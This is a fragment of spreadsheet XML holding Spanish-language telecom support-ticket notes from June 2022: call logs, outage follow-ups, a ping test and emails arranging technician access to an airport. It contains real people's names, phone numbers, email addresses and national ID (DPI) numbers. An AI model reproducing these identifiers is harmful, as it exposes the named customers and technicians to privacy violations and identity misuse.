    <t>**SE LLAMA A CLIENTE CARLOS GODINEZ AL 40713166 NO RESPONDE || ENVIA A BUZON || SE INTENTARA
LUEGO **
-ID 2001785775
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  CARLOS GODINEZ 40713166 MENCIONA QUE NO HA PODIDO REALIZAR PRUEBAS POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 16:00 HRS
-ID 2001952877</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GODINEZ AL 40713166 SOLICITA LLAMADA PARA MAÑANA DESPUES DE LAS 16:00 HRS**
-ID 3001190975
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS GODINEZ 40713166 MENCIONA QUE AUN NO HA PODIDO REALIZAR PRUEBAS, CLIENTE SOLICITA LLAMDA PARA EL VIERNES A LAS 16:00 RHS
-ID 3001417204</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS GODINEZ 40713166 MENCIONA QUE OTRAS VECES HAN CERTIFICADO EL SERVICIO CON EL ANCHO DE BANA PERO A LA HORA O EL DIA SIGUIENTE VUELVE A PRESENTAR EL PROBLEMA
CLIENTE CARLOS GODINEZ 40713166 ATENDERA A PERSONAL TECNICO
-ID 2001384277</t>
  </si>
  <si>
    <t>SE PROCEDERA A SOLICITAR DATOS A CLIENTE-- SE SOLICITA APOYO A RETROALIMENTACION--
F4595601</t>
  </si>
  <si>
    <t>F4595623</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILSON 43023702 - 24592860 NO RESPONDE SE INTENTARA LUEGO **
ID 2001226420 - 2001226837
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 24592860 - 43023702 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001269054 - 2001269129</t>
  </si>
  <si>
    <t>F4595635</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  CESAR NOYOLA 21339100 SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001232208</t>
  </si>
  <si>
    <t>F4595649</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE MARTINEZ 22649370 EXT. 49600 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001394057</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE MARTINEZ 22649370 EXT. 49600 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001235992 - 2001236283</t>
  </si>
  <si>
    <t>F4595652</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ARNOLD CABALLERO AL 3185-0297 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID  2001235483
**</t>
  </si>
  <si>
    <t>F4595655</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 9 DE JUNIO DE 2022 15:20
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE INESTABLE DE DA-NI-PLANTA-HORTIFRUTI-MANAGUA ID: 4584285
BUENA TARDE
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE, QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*</t>
  </si>
  <si>
    <t>**SE LLAMA AL CLIENTE A LA  CENTRAL AL 22437253 CONTESTA EL SEÑOR STEVEN MARQUEZ  QUIEN INDICA QUE SE LE HABIA ENVIADO CORREO Y QUE EL TEC SE PRESENTO PERO NO ESTABA LA PERSONA QUE LO ATENDERIA Y EL SOLICITO LA VISITA PARA MAÑANA DE 8 A 12:00 PM || SE NOTIFICA A GESTOR **
-ID 2001469088
**</t>
  </si>
  <si>
    <t>SE HABLÓ CON MALAQUÍAS PANJOJ/CLIENTE 22437253 CONFIRMA ENLACE OK, PERO PIDE SE PROLONGUE EL MONITOREO HASTA MAÑANA A LAS 07:00AM</t>
  </si>
  <si>
    <t>F4595675</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 DEJAN EN ESPERA, SE ESPERA POR MAS DE 6 MIN Y NO RETOMAN LA LLAMDA
-ID 2001406544</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 NO RESPONDEN, SE INTENTARA LUEGO
-ID 2001518745 - 2001518889</t>
  </si>
  <si>
    <t>SE HABLÓ CON JUAN HERNÁNDEZ/CLIENTE 00 525551745299 INDICA QUE ELLOS NO TIENEN GESTIÓN DE LOS EQUIPOS, PERO ESTÁN A LA ESPERA DE COMENTARIOS DE CLIENTE FINAL, PIDE SE LE LLAME A LAS 15:30 HORAS PARA SEGUIMIENTO.
ASUNTO: RE: IBEX GLOBAL SOLUTIONS - IBEX-DA-EQUINIX - ML2-M00064US-US4110F-NP [CST-EPL-ETH-10123] - REACHABILITY ISSUES || IMIBX000003</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 10:43
PARA: LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; 'GARRIDO RODRIGUEZ LAEYLA MONSERRAT' &lt;GRODRIGL@UNINET.COM.MX&gt;; IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; 'CARRILLO MONTERO JOSE ANGEL' &lt;CMONTERJ@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: 'CNOC INTERNACIONAL' &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: IBEX GLOBAL SOLUTIONS - IBEX-DA-EQUINIX - ML2-M00064US-US4110F-NP [CST-EPL-ETH-10123] - REACHABILITY ISSUES || IMIBX000003
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4595682</t>
  </si>
  <si>
    <t>SE HABLÓ CON RAÚL HERNÁNDEZ/CLIENTE 00 525551745299 INDICA QUE AÚN LO VEN DOWN; SE LE PIDE PRUEBAS POR CORREO; INDICA QUE HABLARÁ CON CLIENTE FINAL Y CONTESTARÁ CORREO.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 9 DE JUNIO DE 2022 15:24
PARA: GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ ESCALONA JUAN JOSE &lt;JHESCALO@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002456359OC ### ::: TICKET CNOC IMBBL004194 ### ::: LINK DOWN
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  52 55 5174 5290  HILBERTO INDICA QUE ESTARAN REALIZANDO PRUEBAS CON EL CLIENTE
-ID 2001274434</t>
  </si>
  <si>
    <t>F4595693</t>
  </si>
  <si>
    <t xml:space="preserve"> **SE LLAMA A CLIENTE JOSE LUIS 30247837 INDICA QUE EL SERVICIO YA LO VE UP PERO DESEA SABER COMO LO VEMOS DE LADO NUESTRO || SE NOTIFICA A GESTOR **
ID 2001275593
**</t>
  </si>
  <si>
    <t>F4595696</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO COORDINAR ACCESOS AL AEROPUERTO INTERNACIONAL LA AURORA
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 9 DE JUNIO DE 2022 17:38
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; MILIAN, BORIS &lt;BORIS.MILIAN@RONESDEGUATEMALA.COM&gt;; REYES, PABLO &lt;PABLO.REYES@RONESDEGUATEMALA.COM&gt;; MARIA FERNANDA LOPEZ ROSAS &lt;MARIAF.LOPEZ@CLARO.COM.GT&gt;; LOIDA RAQUEL CIFUENTES GARCIA &lt;LOIDA.CIFUENTES@CLARO.COM.GT&gt;; HENRY, GUILLERMO &lt;GUILLERMO.HENRY@RONESDEGUATEMALA.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: RED CLARO AEROPUERTO || F4595696 || 328300004T
BUENAS TARDES APRECIABLE CLIENTE
SOLICITAMOS DE SU APOYO COORDINANDO ACCESOS A LAS INSTALACIONES DEL AEROPUERTO INTERNACIONAL
LA AURORA, ESTAREMOS PENDIENTES DE FECHA Y HORA DE VISITA.
ADJUNTO EL PERSONAL Y EL ÁREA DONDE SE CONSIDERA NECESARIO INGRESAR PARA VALIDAR FUNCIONAMIENTO DE EQUIPOS.
ÁREA: NODO Y SITIO DE CELDA  EDIFICIO DE LA TERMINAL, NIVEL 3, NIVEL 4, AZOTEA, SÓTANOS, ÁREAS 2,4,6 Y TERRAZA DEL EDIFICIO Y SUB-NODOS DISTRIBUIDOS EN LAS DIFERENTES ÁREAS DEL AEROPUERTO
NOMBRE COMPLETO:
NO. DE DPI
TELÉFONO DE CONTACTO:
 CARLOS MANUEL MORALES CHITIC
 2334954521406
58260390
 MARLON DAVID VELASQUEZ BRAVO
 2206587811202
58262164
ÁLVARO ENRIQUE RAMIREZ TELLES
2700 24700 0101
58263515
NOMBRE
IBM
DPI
MARLON ENRIQUE MUÑOZ ORELLANA
652515
1582 46500 1801
JOSÉ ALBERTO IXPATA TOJ
608559
1660 02313 1503
JUAN JOSE RODRIGUEZ PAZ
217826
2494 43260 0208
PEDRO EDUARDO TOT MARTINEZ
739764
1681 34810 0101</t>
  </si>
  <si>
    <t>SE LE ENVIA CORREO A CLIENTE ADICIONANDO LOS DPI EN IMAGEN DEL PERSONAL DE ENERGIA, PARA QUE TAMBIEN LOS INCLUYA EN LOS ACCESOS, PENDIENTE DEL COMENTARIO DEL CLIENTE
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 11 DE JUNIO DE 2022 16:12
PARA: HENRY, GUILLERMO &lt;GUILLERMO.HENRY@RONESDEGUATEMALA.COM&gt;; ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; MILIAN, BORIS &lt;BORIS.MILIAN@RONESDEGUATEMALA.COM&gt;; REYES, PABLO &lt;PABLO.REYES@RONESDEGUATEMALA.COM&gt;; MARIA FERNANDA LOPEZ ROSAS &lt;MARIAF.LOPEZ@CLARO.COM.GT&gt;; LOIDA RAQUEL CIFUENTES GARCIA &lt;LOIDA.CIFUENTES@CLARO.COM.GT&gt;; GALINDO, DIEGO &lt;DIEGO.GALINDO@RONESDEGUATEMALA.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: RED CLARO AEROPUERTO || F4595696 || 328300004T
BUENAS TARDES APRECIABLE CLIENTE
GRACIAS POR APOYARNOS CON EL SEGUIMIENTO PARA EJECUTAR LA VISITA TÉCNICA.
SOLICITAMOS DE SU APOYO AGREGAR A LOS PERMISOS AL SIGUIENTE PERSONAL, LAS DISCULPAS DEL CASO YA QUE VEO QUE NO SE LE TRASLADO LOS DPI DEL PERSONAL DE ENERGÍA DE CLARO TAMBIÉN, POR FAVOR SU APOYO GESTIONANDO LOS ACCESOS PARA ELLOS TAMBIÉN YA QUE LA VISITA SE DEBE REALIZAR EN CONJUNTO, ESTAREMOS PENDIENTES DE SUS COMENTARIOS PARA CONFIRMAR LOS DÍAS DE VISITA.</t>
  </si>
  <si>
    <t>*** SE ENVÍAN DATOS DE PERSONAL TÉCNICO A CLIENTE (3 DE PLEX Y 3 DE ENERGÍA), ADICIONAL SE BRINDA INFORMACIÓN (LISTADO) DE LAS HERRAMIENTAS A INGRESAR PARA LA VISITA SOLICITADA, A LA ESPERA DE QUE CLIENTE CONFIRME HORARIO Y FECHA PARA LA VISITA ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 13:25
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; MILIAN, BORIS &lt;BORIS.MILIAN@RONESDEGUATEMALA.COM&gt;; HENRY, GUILLERMO &lt;GUILLERMO.HENRY@RONESDEGUATEMALA.COM&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; REYES, PABLO &lt;PABLO.REYES@RONESDEGUATEMALA.COM&gt;; MARIA FERNANDA LOPEZ ROSAS &lt;MARIAF.LOPEZ@CLARO.COM.GT&gt;; LOIDA RAQUEL CIFUENTES GARCIA &lt;LOIDA.CIFUENTES@CLARO.COM.GT&gt;; GALINDO, DIEGO &lt;DIEGO.GALINDO@RONESDEGUATEMALA.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MOLINA, HECTOR ESTUARDO &lt;HECTOR.MOLINA@RONESDEGUATEMALA.COM&gt;; CASA DEL RON AEROPUERTO &lt;CASADELRONAEROPUERTO@RONESDEGUATEMALA.COM&gt;
ASUNTO: RE: RED CLARO AEROPUERTO || F4595696 || 328300004T
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, COMO BIEN SE HA SOLICITADO ADJUNTO LISTADO DE HERRAMIENTAS A INGRESAR PARA LA VISITA SOLICITADA. A SU VEZ NUEVAMENTE ADJUNTO INFORMACIÓN DE DPI DEL PERSONAL TÉCNICO QUE SE HARÁ PRESENTE:
LISTADO:
POR PARTE DE PLANTA EXTERNA INGRESARÁN:
1 COMPUTADORA LAPTOP, CON CABLES UTP
POR PARTE DE PLANTA INTERNA INGRESARÁN:
1 CAJA DE HERRAMIENTA
1 AMPERÍMETRO MACA FLUKE
1 ALICATE
1 CORTA ALAMBRE
1 DESATORNILLADOR TORX MULTIPUNTAS
1 ALICATE TIPO PINZA
1 CORTA ALAMBRE
4 DESATORNILLADORES BORNEROS
4 DESATORNILLADORES AISLADOS
1 CUCHILLA PARA ELECTRICISTA
4 DESATORNILLADORES STANLEY
6 DESATORNILLADORES TORX TIPO NAVAJA
1 CINTA MÉTRICA DE 5 METROS
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BORIS MILIAN AL 44992910  NO RESPONDE || SE INTENTARA LUEGO PARA CONFIRMAR ACCESOS* *
ID 2001442404
**</t>
  </si>
  <si>
    <t>*** SE RECIBEN DOCUMENTOS DE AMBOS SUPERVISORES (PLEX Y PLIN), POR LO QUE SE HAN REMITIDO A ADMINISTRACIÓN DEL AEROPUERTO. Y ASÍ GESTIONAR ACCESOS PARA LA VERIFICACIÓN. SIENDO ASÍ SE QUEDA A LA ESPERA DE CONFIRMACIÓN POR PARTE DE AEROPUERTO PARA FECHA Y HORARIO DE VISITA ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 9:04
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; HENRY, GUILLERMO &lt;GUILLERMO.HENRY@RONESDEGUATEMALA.COM&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; MILIAN, BORIS &lt;BORIS.MILIAN@RONESDEGUATEMALA.COM&gt;; REYES, PABLO &lt;PABLO.REYES@RONESDEGUATEMALA.COM&gt;; MARIA FERNANDA LOPEZ ROSAS &lt;MARIAF.LOPEZ@CLARO.COM.GT&gt;; LOIDA RAQUEL CIFUENTES GARCIA &lt;LOIDA.CIFUENTES@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: RED CLARO AEROPUERTO || F4595696 || 328300004T
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, SE ADJUNTA DOCUMENTOS SOLICITADOS, ELLO PARA LOS 6 TÉCNICOS ASIGNADOS. ASIMISMO QUEDO A LA ESPERA DE QUE NOS PUEDAN CONFIRMAR UNA FECHA Y HORARIO PARA LA VISITA.
ÁREA A VERIFICAR: NODO Y SITIO DE CELDA  EDIFICIO DE LA TERMINAL, NIVEL 3, NIVEL 4, AZOTEA, SÓTANOS, ÁREAS 2,4,6 Y TERRAZA DEL EDIFICIO Y SUB-NODOS DISTRIBUIDOS EN LAS DIFERENTES ÁREAS DEL AEROPUERTO.
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE ENERGIA, COMENTA QUE NO HAY NINGUN INCOVENIENTE CON LO SOLICITO POR EL CLIENTE, SE ENVIA CORREO AL CLIENTE Y SE SOLICITA DIA Y HORA EXACTA DE VISITA PARA NO TENER NINGUN RETRASO CON LOS TECNICOS
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 16:20
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; HENRY, GUILLERMO &lt;GUILLERMO.HENRY@RONESDEGUATEMALA.COM&gt;; ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;; MILIAN, BORIS &lt;BORIS.MILIAN@RONESDEGUATEMALA.COM&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; REYES, PABLO &lt;PABLO.REYES@RONESDEGUATEMALA.COM&gt;; MARIA FERNANDA LOPEZ ROSAS &lt;MARIAF.LOPEZ@CLARO.COM.GT&gt;; LOIDA RAQUEL CIFUENTES GARCIA &lt;LOIDA.CIFUENTES@CLARO.COM.GT&gt;; GALINDO, DIEGO &lt;DIEGO.GALINDO@RONESDEGUATEMALA.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MOLINA, HECTOR ESTUARDO &lt;HECTOR.MOLINA@RONESDEGUATEMALA.COM&gt;; CASA DEL RON AEROPUERTO &lt;CASADELRONAEROPUERTO@RONESDEGUATEMALA.COM&gt;
ASUNTO: RE: RED CLARO AEROPUERTO || F4595696 || 328300004T
BUENA TARDE
ESTIMADO CLIENTE DANDO SEGUIMIENTO AL INCIDENTE REPORTADO, SE PLATICÓ CON PERSONAL TÉCNICO EL CUAL CONFIRMAN PODER INGRESAR A LAS INSTALACIONES SIN LAS HERRAMIENTAS QUE USTEDES MENCIONARON, POR LO QUE SOLICITO DE SU APOYO EN VALIDAR EL DIA Y LA HORA EXACTA DE VISITA PARA NO TENER NINGUN INCONVIENTE.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>CLIENTE ENVIÓ CORREO PARA QUE SE COORDINE LA VISITA TÉCNICA PARA EL DÍA JUEVES 16 EN HORARIO DE 08:00AM A 17:00 HORAS.
DE: HENRY, GUILLERMO [MAILTO:GUILLERMO.HENRY@RONESDEGUATEMALA.COM]
ENVIADO EL: MARTES, 14 DE JUNIO DE 2022 07:17
ASUNTO: RE: RED CLARO AEROPUERTO || F4595696 || 328300004T
BUENOS DIAS JUAN CARLOS.
DE 8AM A 5PM ESTARÍA BIEN.
SALUDOS.
GH</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE A LA ESPERA DE LA HORA PARA PROCEDER CON VISITA EN LAS FECHAS YA MENCIONADAS
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 19:02
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; HENRY, GUILLERMO &lt;GUILLERMO.HENRY@RONESDEGUATEMALA.COM&gt;; ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;; MILIAN, BORIS &lt;BORIS.MILIAN@RONESDEGUATEMALA.COM&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; REYES, PABLO &lt;PABLO.REYES@RONESDEGUATEMALA.COM&gt;; MARIA FERNANDA LOPEZ ROSAS &lt;MARIAF.LOPEZ@CLARO.COM.GT&gt;; LOIDA RAQUEL CIFUENTES GARCIA &lt;LOIDA.CIFUENTES@CLARO.COM.GT&gt;; GALINDO, DIEGO &lt;DIEGO.GALINDO@RONESDEGUATEMALA.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MOLINA, HECTOR ESTUARDO &lt;HECTOR.MOLINA@RONESDEGUATEMALA.COM&gt;; CASA DEL RON AEROPUERTO &lt;CASADELRONAEROPUERTO@RONESDEGUATEMALA.COM&gt;
ASUNTO: RE: RED CLARO AEROPUERTO || F4595696 || 328300004T
BUENA TARDE
ESTIMADO CLIENTE DANDO SEGUIMIENTO AL INCIDENTE REPORTADO, SOLICITAMOS DE SU APOYO EN BRINDAR HORARIO DE VISITA PARA QUE PERSONAL TÉCNICO PUEDA ESTAR EN PUNTO EN LAS INSTALACIONES Y NO TENER ALGÚN ATRASO ALGUNO.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BORIS MILIAN AL 44992910  INDICA QUE SI ESTA BIEN QUE SE LE VISITE EL DIA LUNES QUE YA ESTAN LOS PERMISOS AUTORIZADOS TAMBIEN **
-ID 3001584573
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  BORIS MILIAN 44992910 MENCIONA QUE ESTARA RESPONDIENDO POR CORREO YA QUE SE NECESITAN ALGUNAS RECOMENDACIONES
-ID 2001411836</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DEL PR ANDREA 53442402/44992996 ID: 2001244154 INDICA QUE LO QUE DESEAN ES QUE SE LES ENVÍE UN TÉCNICO A VERIFICAR Y NO DESEA APOYAR CON MAS PRUEBAS, SE NOTIFICA A GESTOR RAMOS.MARLON POR SKYPE Y SE CAMBIA DE ESTADO*/*/*/</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BORIS MILIAN 44992910 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001383268</t>
  </si>
  <si>
    <t>F4595704</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  52 (55) 5174 5299 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001296143.</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE PRUEBAS DE CONECTIVIDAD HACIA LA IP WAN.
ASUNTO:  SOLICITUD DE SOPORTE ::: ID LOCAL VARIOS ::: TICKET CNOC IMBBL004185::: "FUERA DE SERVICIO"
JURGEN RENE BOCH CAAL
BUENAS TARDES,
ESTIMADO CLIENTE, CON RESPECTO AL ENLACE CON ID CONTR0002484128OC, UBICADO EN PUNTARENAS FRENTE A LA PLANTA DE SIGMA ALIMENTOS, OBSERVAMOS EL SERVICIO ACTIVO.  ADJUNTO PRUEBAS.
PING -C 1500 -S 1500 -M 55 -B -VPN-INSTANCE VPN_BIMBO-CRICA_0 10.201.52.197
  PING 10.201.52.197: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.201.52.197 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 5/6/30 MS
SALUDOS
.</t>
  </si>
  <si>
    <t>F4595706</t>
  </si>
  <si>
    <t>SE HABLÓ CON LUIS RAMOS/CLIENTE 30318896 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4595709</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  NOHEMI BONILLA AL 26802627 INDICA QUE EL SERVICIO HA SIDO MUY INESTABLE POR EL  MOMENTO ESTA ESTABLE PERO HA ESTADO SIEMPRE CON LA LENTITUD SOLICITA QUE SE LE REALIZE VISITA TECNICA Y BRINDA LOS SIGUIENTES DATOS || SE NOTIFICA A GESTOR **
ID 2001279091
